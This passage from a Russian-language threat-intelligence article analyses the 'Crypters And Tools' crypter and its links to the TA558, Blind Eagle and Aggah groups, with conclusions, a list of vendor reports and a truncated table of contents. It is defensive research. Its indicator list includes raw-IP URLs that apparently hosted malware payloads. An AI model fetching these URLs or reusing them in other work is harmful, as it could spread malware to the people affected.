\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0442\u0430\u043a \u0436\u0435, \u043a\u0430\u043a \u0438 \u043c\u043d\u043e\u0433\u0438\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u0431\u044b\u043b \u043d\u0430\u0439\u0434\u0435\u043d \u0447\u0435\u0440\u0435\u0437 API \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 CryptersAndTools, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043d \u0434\u0435\u043b\u0430\u043b \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a:<\/p>\n<ul>\n<li>\n<p>http:\/\/94.156.65.247\/Users_API\/HURRICANE\/file_lfhsdrdp.5db.txt<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9b1\/298\/1f1\/9b12981f19c0e8b9a820b678f503de5c.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a042. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f Crypters And\u00a0Tools\u00a0\u2014 HURRICANE\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a042. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f Crypters And\u00a0Tools\u00a0\u2014 HURRICANE\" width=\"956\" height=\"591\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9b1\/298\/1f1\/9b12981f19c0e8b9a820b678f503de5c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9b1\/298\/1f1\/9b12981f19c0e8b9a820b678f503de5c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a042. \u041f\u0440\u0438\u043c\u0435\u0440 \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f Crypters And\u00a0Tools\u00a0\u2014 HURRICANE<\/figcaption><\/div>\n<\/figure>\n<p>\u0418\u043c\u0435\u043d\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0431\u044b\u043b\u0438 \u043f\u043e\u0445\u043e\u0436\u0438 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 TA558, \u043d\u043e \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0430\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430 \u0430\u0442\u0430\u043a\u0438 \u043e\u0442\u043b\u0438\u0447\u0430\u043b\u0430\u0441\u044c.<\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u043c\u044b \u0432\u0438\u0434\u0435\u043b\u0438 \u0435\u0449\u0451 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e URL-\u043e\u0432 \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438, \u043e\u0442\u043d\u043e\u0441\u044f\u0449\u0438\u043c\u0438\u0441\u044f \u043a Crypters And Tools, \u043d\u043e \u043f\u043e\u043a\u0430 \u043d\u0435 \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u043c \u043f\u043e \u043d\u0438\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438:<\/p>\n<ul>\n<li>\n<p><a href=\"http:\/\/91.92.254.14\/Users_API\/Just1ne\/file_1hsfgryb.he3.txt\">http:\/\/91.92.254.14\/Users_API\/Just1ne\/file_1hsfgryb.he3.txt<\/a><\/p>\n<\/li>\n<li>\n<p>http:\/\/91.92.254.14\/Users_API\/gavrels\/file_ycm2xqby.heg.txty<\/p>\n<\/li>\n<li>\n<p>https:\/\/91.92.254.29\/Users_API\/Ws\/file_wuey5ekz.pcq.txt<\/p>\n<\/li>\n<\/ul>\n<p><a class=\"anchor\" name=\"8\" id=\"8\"><\/a><\/p>\n<h2>8. \u0412\u044b\u0432\u043e\u0434\u044b<\/h2>\n<p>\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 \u043e\u0442\u0447\u0451\u0442\u0430\u0445 \u0447\u0430\u0441\u0442\u043e \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 Crypters And Tools, \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432 \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f, \u043d\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u043a\u0430\u0437\u0430\u043b\u0438 \u0447\u0430\u0441\u0442\u044c \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0442 Crypters And Tools. \u0412 \u044d\u0442\u043e\u0439 \u0447\u0430\u0441\u0442\u0438 \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u043a\u0430\u043a\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0440, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0445 \u0441\u0432\u044f\u0437\u0438 \u0434\u0440\u0443\u0433 \u0441 \u0434\u0440\u0443\u0433\u043e\u043c.<\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u043c\u044b \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0438 \u0442\u043e\u0447\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u0447\u0430\u0441\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0447\u043b\u0435\u043d\u0430\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a Blind Eagle \u0438 TA558. \u0410 \u0442\u0430\u043a\u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 Bukky101, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e \u0441 \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0437\u0430 \u0441\u0443\u0442\u043a\u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c 60300 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.<\/p>\n<p>\u0422\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 Aggah \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0437\u0430\u0442\u0438\u0448\u044c\u0435 \u0432 2022 \u0433\u043e\u0434\u0443, \u0438\u0445 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f \u0432 2024 \u0438 2025 \u0433\u043e\u0434\u0430\u0445. \u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 serverless-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Blosgspot \u0438 Bitbucket), \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0438\u0437\u043c\u0435\u043d\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f. \u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 \u044d\u0442\u0438\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u044b\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Rhadamanthys \u0438 XWorm.<\/p>\n<p><a class=\"anchor\" name=\"9\" id=\"9\"><\/a><\/p>\n<h2>9. \u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0442\u0430\u0442\u0435\u0439 \u0441 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430<\/h2>\n<h3>Aggah<\/h3>\n<ol>\n<li>\n<p><a href=\"https:\/\/malware.news\/t\/unknown-ttps-of-remcos-rat\/80082\">https:\/\/malware.news\/t\/unknown-ttps-of-remcos-rat\/80082<\/a><\/p>\n<\/li>\n<li>\n<blockquote class=\"wp-embedded-content\" data-secret=\"dUOMNffldT\"><p><a href=\"https:\/\/yoroi.company\/research\/serverless-infostealer-delivered-in-est-european-countries\/\">Serverless InfoStealer delivered in Est European Countries<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; visibility: hidden;\" title=\"&#8220;Serverless InfoStealer delivered in Est European Countries&#8221; &#8212; New Jetpack Site\" src=\"https:\/\/yoroi.company\/research\/serverless-infostealer-delivered-in-est-european-countries\/embed\/#?secret=nEk32C8bI6#?secret=dUOMNffldT\" data-secret=\"dUOMNffldT\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<\/li>\n<li>\n<p>https:\/\/web.archive.org\/web\/20240106015245\/https:\/marcoramilli.com\/2022\/11\/21\/is-hagga-threat-actor-abusing-fsociety-framework\/<\/p>\n<\/li>\n<li>\n<p>https:\/\/ti.qianxin.com\/blog\/articles\/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN\/<\/p>\n<\/li>\n<\/ol>\n<h3>TA558<\/h3>\n<ol>\n<li>\n<p><a href=\"https:\/\/www.metabaseq.com\/threat\/ta588\/\">https:\/\/www.metabaseq.com\/threat\/ta588\/<\/a><\/p>\n<\/li>\n<li>\n<p>https:\/\/www.forcepoint.com\/blog\/x-labs\/url-shortener-microsoft-word-remcos-rat-trojan<\/p>\n<\/li>\n<li>\n<blockquote class=\"wp-embedded-content\" data-secret=\"8jBJIHaY6k\"><p><a href=\"https:\/\/cyble.com\/blog\/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns\/\">Threat Actor Employs PowerShell-Backed Steganography in Recent Spam Campaigns<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; visibility: hidden;\" title=\"&#8220;Threat Actor Employs PowerShell-Backed Steganography in Recent Spam Campaigns&#8221; &#8212; Cyble\" src=\"https:\/\/cyble.com\/blog\/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns\/embed\/#?secret=UA8ide02rs#?secret=8jBJIHaY6k\" data-secret=\"8jBJIHaY6k\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<\/li>\n<li>\n<p>https:\/\/www.seqrite.com\/blog\/steganographic-campaign-distributing-malware\/<\/p>\n<\/li>\n<li>\n<p>https:\/\/www.trellix.com\/blogs\/research\/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat\/<\/p>\n<\/li>\n<li>\n<blockquote class=\"wp-embedded-content\" data-secret=\"BjTgbDBtRE\"><p><a href=\"https:\/\/www.cyfirma.com\/research\/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla\/\">Exploiting Document Templates: Stego-Campaign Deploying Remcos RAT and Agent Tesla<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; visibility: hidden;\" title=\"&#8220;Exploiting Document Templates: Stego-Campaign Deploying Remcos RAT and Agent Tesla&#8221; &#8212; CYFIRMA\" src=\"https:\/\/www.cyfirma.com\/research\/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla\/embed\/#?secret=SCl8O6SQ8f#?secret=BjTgbDBtRE\" data-secret=\"BjTgbDBtRE\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<\/li>\n<\/ol>\n<h3>Blind Eagle<\/h3>\n<ol>\n<li>\n<p><a href=\"https:\/\/blogs.blackberry.com\/en\/2023\/02\/blind-eagle-apt-c-36-targets-colombia\">https:\/\/blogs.blackberry.com\/en\/2023\/02\/blind-eagle-apt-c-36-targets-colombia<\/a><\/p>\n<\/li>\n<li>\n<p>https:\/\/www.esentire.com\/blog\/blind-eagles-north-american-journey<\/p>\n<\/li>\n<li>\n<p>https:\/\/mp.weixin.qq.com\/s\/DDCCjhBjUTa7Ia4Hggsa1A<\/p>\n<\/li>\n<li>\n<p>https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/<\/p>\n<\/li>\n<\/ol>\n<h3>PhantomControl<\/h3>\n<ol>\n<li>\n<p>https:\/\/www.esentire.com\/blog\/phantomcontrol-returns-with-ande-loader-and-swaetrat<\/p>\n<\/li>\n<\/ol>\n<h3>\u0421\u0442\u0430\u0442\u044c\u0438 \u0441\u00a0\u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c Crypters And\u00a0Tools \u0431\u0435\u0437\u00a0\u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u00a0\u043a\u0430\u043a\u0438\u043c-\u043b\u0438\u0431\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c<\/h3>\n<ul>\n<li>\n<p><a href=\"https:\/\/somedieyoungzz.github.io\/posts\/stego-camp\/\">https:\/\/somedieyoungzz.github.io\/posts\/stego-camp\/<\/a><\/p>\n<\/li>\n<li>\n<blockquote class=\"wp-embedded-content\" data-secret=\"H7nY1tGzzb\"><p><a href=\"https:\/\/asec.ahnlab.com\/en\/65111\/\">RemcosRAT Distributed Using Steganography<\/a><\/p><\/blockquote>\n<p><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; visibility: hidden;\" title=\"&#8220;RemcosRAT Distributed Using Steganography&#8221; &#8212; ASEC\" src=\"https:\/\/asec.ahnlab.com\/en\/65111\/embed\/#?secret=pVgzjqpxDo#?secret=H7nY1tGzzb\" data-secret=\"H7nY1tGzzb\" width=\"500\" height=\"282\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/p>\n<\/li>\n<li>\n<p>https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion\/<\/p>\n<\/li>\n<li>\n<p>https:\/\/www.zscaler.com\/blogs\/security-research\/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla<\/p>\n<\/li>\n<li>\n<p>https:\/\/www.fortinet.com\/blog\/threat-research\/python-info-stealer-malicious-excel-document<\/p>\n<\/li>\n<li>\n<p><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" title=\"\u3070\u3089\u307e\u304d\u30e1\u30fc\u30eb\u306b\u6f5c\u3080\u6b7b\u795e\u306e\u60aa\u622f\u3092\u7d10\u89e3\u304f - ITOCHU Cyber &amp; Intelligence Inc.\" src=\"https:\/\/hatenablog-parts.com\/embed?url=https%3A%2F%2Fblog.itochuci.co.jp%2Fentry%2F2024%2F04%2F16%2F163014#?secret=fNKBzx0py3\" data-secret=\"fNKBzx0py3\" scrolling=\"no\" frameborder=\"0\"><\/iframe><\/p>\n<\/li>\n<li>\n<p>https:\/\/medium.com\/@b.magnezi\/malware-analysis-xworm-80b3bbb072fb<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<div class=\"persona\"><img class=\"image persona__image\"\/><\/p>\n<h5 class=\"persona__heading\">\u0410\u043b\u0435\u043a\u0441\u0430\u043d\u0434\u0440 \u0411\u0430\u0434\u0430\u0435\u0432<\/h5>\n<p>\u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 Positive Technologies<\/p>\n<\/div>\n<div class=\"persona\"><img class=\"image persona__image\"\/><\/p>\n<h5 class=\"persona__heading\">\u0415\u043b\u0435\u043d\u0430 \u0424\u0443\u0440\u0430\u0448\u043e\u0432\u0430<\/h5>\n<p class=\"persona__text\">\u0421\u0442\u0430\u0436\u0435\u0440 \u0433\u0440\u0443\u043f\u043f\u044b \u043a\u0438\u0431\u0435\u0440\u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 Positive Technologies<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><!----><!----><\/div>\n<p><!----><!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/905308\/\"> https:\/\/habr.com\/ru\/articles\/905308\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><!--[--><!--]--><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><\/figure>\n<details class=\"spoiler\">\n<summary>\u0421\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435<\/summary>\n<div class=\"spoiler__content\">\n<ol>\n<li>\n<p><a href=\"#1\">\u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043d\u0430\u0445\u043e\u0434\u043a\u0438<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#2\">\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#3\">\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 Crypters And Tools \u0432 \u0430\u0442\u0430\u043a\u0430\u0445<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#4\">PhaseShifters, UAC-0050 \u0438 PhantomControl<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#5\">\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0433\u0440\u0443\u043f\u043f\u044b TA558 \u0438 \u0435\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u044f \u043e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b Blind Eagle<\/a><\/p>\n<p>5.1 <a href=\"#5.1\">\u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 URL \u0438 \u0438\u043c\u0435\u043d\u0430 \u0444\u0430\u0439\u043b\u043e\u0432 TA558<\/a><\/p>\n<p>5.2 <a href=\"#5.2\">\u0425\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u044b TA558<\/a><\/p>\n<p>5.3 <a href=\"#5.3\">\u0420\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 TA558 \u0438 Blind Eagle<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#6\">Aggah. \u041d\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0441\u0432\u044f\u0437\u044c \u0441 TA558<\/a><\/p>\n<p>6.1 <a href=\"#6.1\">\u041f\u0435\u0440\u0432\u044b\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u044f Aggah<\/a><\/p>\n<p>6.1.1. <a href=\"#6.1.1.\">\u0410\u0442\u0430\u043a\u0438 2018 \u0433\u043e\u0434\u0430<\/a><\/p>\n<p>6.1.2. <a href=\"#6.1.2.\">\u0410\u0442\u0430\u043a\u0438 2019 \u0433\u043e\u0434\u0430<\/a><\/p>\n<p>6.1.3. <a href=\"#6.1.3.\">Hagga (Aggah). \u0420\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438<\/a><\/p>\n<p>6.1.4. <a href=\"#6.1.4.\">\u0410\u0442\u0430\u043a\u0438 2020-2022 \u0433\u043e\u0434\u043e\u0432<\/a><\/p>\n<p>6.2 <a href=\"#6.2\">\u0410\u0442\u0430\u043a\u0438 2023-2025 \u0433\u043e\u0434\u043e\u0432<\/a><\/p>\n<p>6.2.1. <a href=\"#6.2.1.\">\u041e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f Aggah \u0441 TA558<\/a><\/p>\n<p>6.3 <a href=\"#6.3\">\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Crypters And Tools \u0433\u0440\u0443\u043f\u043f\u043e\u0439 Aggah<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#7\">\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Crypters And Tools \u0438 \u0438\u0445 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438<\/a><\/p>\n<p>7.1 <a href=\"#7.1\">bukky101<\/a><\/p>\n<p>7.2 <a href=\"#7.2\">Blind Eagle: deadpoolstart2025 \u0438 ABBAS<\/a><\/p>\n<p>7.3 <a href=\"#7.3\">TA558: Brainiac, syscore \u0438 negrocock<\/a><\/p>\n<p>7.4 <a href=\"#7.4\">KareemHacker<\/a><\/p>\n<p>7.5 <a href=\"#7.5\">HeadMaster<\/a><\/p>\n<p>7.6 <a href=\"#7.6\">\u041e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#8\">\u0412\u044b\u0432\u043e\u0434\u044b<\/a><\/p>\n<\/li>\n<li>\n<p><a href=\"#9\">\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0442\u0430\u0442\u0435\u0439 \u0441 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430\u00a0<\/a><\/p>\n<\/li>\n<\/ol>\n<\/div>\n<\/details>\n<p><a class=\"anchor\" name=\"1\" id=\"1\"><\/a><\/p>\n<h2>1. \u041a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u043d\u0430\u0445\u043e\u0434\u043a\u0438<\/h2>\n<ul>\n<li>\n<p>\u041a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c, 6 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 Crypters And Tools<\/p>\n<\/li>\n<li>\n<p>\u0427\u0430\u0441\u0442\u044c \u0438\u0437 \u043d\u0438\u0445 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u043c\u0435\u0436\u0434\u0443 \u0441\u043e\u0431\u043e\u0439, \u0447\u0442\u043e \u043c\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438 \u0432 \u0441\u0432\u043e\u0451\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438<\/p>\n<\/li>\n<li>\n<p>\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Aggah, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0430\u0441\u044c \u0441 2022 \u0433\u043e\u0434\u0430, \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 